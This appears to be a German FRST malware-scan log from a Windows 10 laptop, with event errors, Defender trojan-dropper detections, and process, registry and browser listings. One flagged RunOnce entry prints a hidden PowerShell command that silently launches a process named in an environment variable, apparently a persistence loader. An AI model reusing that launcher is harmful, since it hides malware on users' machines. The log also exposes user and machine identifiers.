Anwendungspfad: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
 

Bericht-ID: 8d968dff-4197-40a0-80a9-beb335dfef47
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Cross-process
 

Error: (12/15/2020 10:07:01 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm Microsoft.Photos.exe Version 2020.20110.11001.0 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 2ddc
 

Startzeit: 01d6d2c180af7335
 

Beendigungszeit: 4294967295
 

Anwendungspfad: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
 

Bericht-ID: 5a8a5bfd-4e3d-4dc8-a2d5-ef7069012949
 

Vollständiger Name des fehlerhaften Pakets: Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe
 

Relative Anwendungs-ID des fehlerhaften Pakets: App
 

Absturztyp: Cross-process
 

Error: (12/15/2020 10:06:58 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 28f4
 

Startzeit: 01d6d2c07cb57be1
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: c526209e-141b-49b4-a607-71cf75713d4a
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Cross-process
 

Error: (12/15/2020 09:58:42 AM) (Source: Application Hang) (EventID: 1002) (User: )

Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
 

Prozess-ID: 2608
 

Startzeit: 01d6d2b1bd864c9b
 

Beendigungszeit: 0
 

Anwendungspfad: C:\Windows\explorer.exe
 

Bericht-ID: b520483e-c602-45e2-8fe9-15a88b5d0f17
 

Vollständiger Name des fehlerhaften Pakets: 
 

Relative Anwendungs-ID des fehlerhaften Pakets: 
 

Absturztyp: Unknown
 

Error: (12/10/2020 08:09:56 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )

Description: Event-ID 0
 
 

Systemfehler:

=============

Error: (01/09/2021 03:46:20 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXjytc7c0yvwb8n3cw0r82k4364sd1s7bv.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
 

Error: (01/09/2021 03:37:12 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 

Error: (01/09/2021 03:36:42 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 

Error: (01/09/2021 03:36:12 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 

Error: (01/09/2021 03:30:31 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppX6jbm6fjqte5wzzrf5807m7eq0z44q5gf.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
 

Error: (01/09/2021 03:30:31 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 

Error: (01/09/2021 03:28:17 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 

Error: (01/09/2021 03:27:48 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)

Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:

"2147958031"

Aufgetreten beim Start dieses Befehls:

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
 
 

Windows Defender:

===================================

Date: 2021-01-09 15:47:12.9890000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-09 15:27:32.2830000Z

Description: 

Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.

Überprüfungs-ID: {CD392251-82AD-4230-8B1B-02F5DAAE2DF1}

Überprüfungstyp: Antimalware

Überprüfungsparameter: Schnellüberprüfung

Benutzer: NT-AUTORITÄT\SYSTEM
 

Date: 2021-01-09 15:00:56.0110000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0

Name: TrojanDropper:Win64/Tnega!MSR

ID: 2147771646

Schweregrad: Schwerwiegend

Kategorie: Trojaner - Dropper

Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

Date: 2021-01-07 19:07:31.1610000Z

Description: 

Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.

Überprüfungs-ID: {F826CD36-B17A-4994-843F-547ED9BF91B1}

Überprüfungstyp: Antimalware

Überprüfungsparameter: Vollständige Überprüfung

Benutzer: PC5-L\buskr5
 

Date: 2021-01-07 19:00:40.2340000Z

Description: 

Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.

Weitere Informationen:

https://go.microsoft.com/fwlink/?linkid=37020&name=App:Chip_Updater_BundleInstaller&threatid=268628&enterprise=0

Name: App:Chip_Updater_BundleInstaller

ID: 268628

Schweregrad: Niedrig

Kategorie: Potenziell unerwünschte Software

Pfad: file:_C:\Users\buskr5\Downloads\Photo Lab - CHIP-Installer.exe

Erkennungsursprung: Lokaler Computer

Erkennungstype: Konkret

Erkennungsquelle: Echtzeitschutz

Benutzer: PC5-L\buskr5

Prozessname: C:\Windows\explorer.exe

Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0

Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4
 

CodeIntegrity:

===================================
 

Date: 2021-01-09 18:05:56.7880000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-09 18:05:56.7830000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-09 18:05:56.5360000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-09 18:05:56.5330000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-09 17:51:30.9740000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 17:51:30.9690000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 

Date: 2021-01-09 17:50:56.2490000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

Date: 2021-01-09 17:50:56.2430000Z

Description: 

Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.
 

==================== Speicherinformationen =========================== 
 

BIOS: FUJITSU // Insyde Software Corp. Version 2.05 06/25/2019

Hauptplatine: FUJITSU FJNBB5C

Prozessor: Intel(R) Core(TM) i3-6006U CPU @ 2.00GHz

Prozentuale Nutzung des RAM: 47%

Installierter physikalischer RAM: 8088.56 MB

Verfügbarer physikalischer RAM: 4282.3 MB

Summe virtueller Speicher: 9368.56 MB

Verfügbarer virtueller Speicher: 5182.09 MB
 

==================== Laufwerke ================================
 

Drive c: () (Fixed) (Total:237.32 GB) (Free:165.13 GB) NTFS
 

\\?\Volume{d4bd63c3-9f0a-44ee-af4e-35806701b471}\ () (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS

\\?\Volume{60a0e813-3eea-47c5-87e8-d6c29f22d114}\ () (Fixed) (Total:0.55 GB) (Free:0.08 GB) NTFS

\\?\Volume{ff4dfa97-53c2-4020-9f39-7bdc41872594}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
 

==================== MBR & Partitionstabelle ====================
 

==================== Ende von Addition.txt =======================

Code:

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021

durchgeführt von buskr5 (ACHTUNG: der Benutzer ist kein Administrator) auf PC5-L (FUJITSU LIFEBOOK A357) (09-01-2021 18:10:56)

Gestartet von C:\Users\buskr5\Downloads

Geladene Profile: buskr5

Platform: Windows 10 Pro Version 20H2 19042.685 (X64) Sprache: Deutsch (Deutschland)

Standard-Browser: Chrome

Start-Modus: Normal
 

==================== Prozesse (Nicht auf der Ausnahmeliste) =================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
 

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe

(ALPS ELECTRIC CO., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHost.exe

(DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe

(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <23>

(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxEM.exe

(Learnpulse -> Learnpulse) C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe

(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe

konnte nicht auf den Prozess zugreifen -> AppleMobileDeviceService.exe

konnte nicht auf den Prozess zugreifen -> armsvc.exe

konnte nicht auf den Prozess zugreifen -> conhost.exe

konnte nicht auf den Prozess zugreifen -> csrss.exe

konnte nicht auf den Prozess zugreifen -> csrss.exe

konnte nicht auf den Prozess zugreifen -> dasHost.exe

konnte nicht auf den Prozess zugreifen -> dllhost.exe

konnte nicht auf den Prozess zugreifen -> dwm.exe

konnte nicht auf den Prozess zugreifen -> fontdrvhost.exe

konnte nicht auf den Prozess zugreifen -> fontdrvhost.exe

konnte nicht auf den Prozess zugreifen -> fuj02e3-utility.exe

konnte nicht auf den Prozess zugreifen -> HidMonitorSvc.exe

konnte nicht auf den Prozess zugreifen -> ibtsiva.exe

konnte nicht auf den Prozess zugreifen -> igfxCUIService.exe

konnte nicht auf den Prozess zugreifen -> iked.exe

konnte nicht auf den Prozess zugreifen -> IntelCpHDCPSvc.exe

konnte nicht auf den Prozess zugreifen -> IntelCpHeciSvc.exe

konnte nicht auf den Prozess zugreifen -> iPodService.exe

konnte nicht auf den Prozess zugreifen -> ipsecd.exe

konnte nicht auf den Prozess zugreifen -> jhi_service.exe

konnte nicht auf den Prozess zugreifen -> LMS.exe

konnte nicht auf den Prozess zugreifen -> lsass.exe

konnte nicht auf den Prozess zugreifen -> mDNSResponder.exe

konnte nicht auf den Prozess zugreifen -> MsMpEng.exe

konnte nicht auf den Prozess zugreifen -> NisSrv.exe

konnte nicht auf den Prozess zugreifen -> OfficeClickToRun.exe

konnte nicht auf den Prozess zugreifen -> SearchFilterHost.exe

konnte nicht auf den Prozess zugreifen -> SearchIndexer.exe

konnte nicht auf den Prozess zugreifen -> SearchProtocolHost.exe

konnte nicht auf den Prozess zugreifen -> SecurityHealthService.exe

konnte nicht auf den Prozess zugreifen -> services.exe

konnte nicht auf den Prozess zugreifen -> SgrmBroker.exe

konnte nicht auf den Prozess zugreifen -> SiPaHostService.exe

konnte nicht auf den Prozess zugreifen -> smss.exe

konnte nicht auf den Prozess zugreifen -> spoolsv.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> svchost.exe

konnte nicht auf den Prozess zugreifen -> TeamViewer_Service.exe

konnte nicht auf den Prozess zugreifen -> wininit.exe

konnte nicht auf den Prozess zugreifen -> winlogon.exe

konnte nicht auf den Prozess zugreifen -> wlanext.exe

konnte nicht auf den Prozess zugreifen -> WmiPrvSE.exe

konnte nicht auf den Prozess zugreifen -> WUDFHost.exe

konnte nicht auf den Prozess zugreifen -> WUDFHost.exe
 

==================== Registry (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
 

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-12-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)

HKLM\...\Run: [DisplayLinkTrayApp] => C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe [2221888 2018-11-21] (DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-07-24] (Apple Inc. -> Apple Inc.)

HKLM-x32\...\Run: [DVCServ] => C:\Program Files (x86)\DATEV\PROGRAMM\SipaCompact\SiPaHost.exe [1094160 2020-10-20] (DATEV eG 08 2 -> DATEV eG)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [Screenpresso] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe [18398304 2021-01-09] (Learnpulse -> Learnpulse)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [HP OfficeJet Pro 7740 (NET)] => C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe [3770504 2018-04-06] (Hewlett Packard -> HP Inc.)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\RunOnce: [buskr5] => powershell -Win Hi -Command "$r = [Environment]::GetEnvironmentVariable('buskr5', 'User').split();$p=$r[0];$r[0]='';Start-Process $p -ArgumentList ($r -join ' ') -Win Hi" <==== ACHTUNG

HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)

HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

Startup: C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Laufwerke.bat [2019-01-27] () [Datei ist nicht signiert]
 

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
 
 

==================== Internet (Nicht auf der Ausnahmeliste) ====================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
 

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)

Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1

Tcpip\..\Interfaces\{379cb8d3-10a1-4062-b840-8afb6c84784b}: [DhcpNameServer] 192.168.10.1

Tcpip\..\Interfaces\{4cec849f-a057-45bf-a346-ef6290670ce0}: [NameServer] 192.168.10.1

Tcpip\..\Interfaces\{8d46b3e8-e3e4-4d57-9ac0-d4bf3d80561a}: [DhcpNameServer] 192.168.1.250

Tcpip\..\Interfaces\{d94cdd1b-4d3b-485d-8a86-23879c01e60c}: [DhcpNameServer] 192.168.178.1

Tcpip\..\Interfaces\{fb4f79cc-731d-4165-b863-585f13ab9b6f}: [DhcpNameServer] 192.168.178.1
 

Edge: 

======

DownloadDir: C:\Users\buskr5\Downloads

Edge DefaultProfile: Default

Edge Profile: C:\Users\buskr5\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-07]

Edge DownloadDir: C:\Users\buskr5\Downloads

Edge StartupUrls: Default -> "hxxp://google.de/"
 

FireFox:

========

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
 

Chrome: 

=======

CHR DefaultProfile: Default

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default [2021-01-09]

CHR Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2020-12-15]

CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]

CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-08]

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-07]

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1 [2021-01-07]

CHR Extension: (Präsentationen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-11-09]

CHR Extension: (Docs) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2020-11-09]

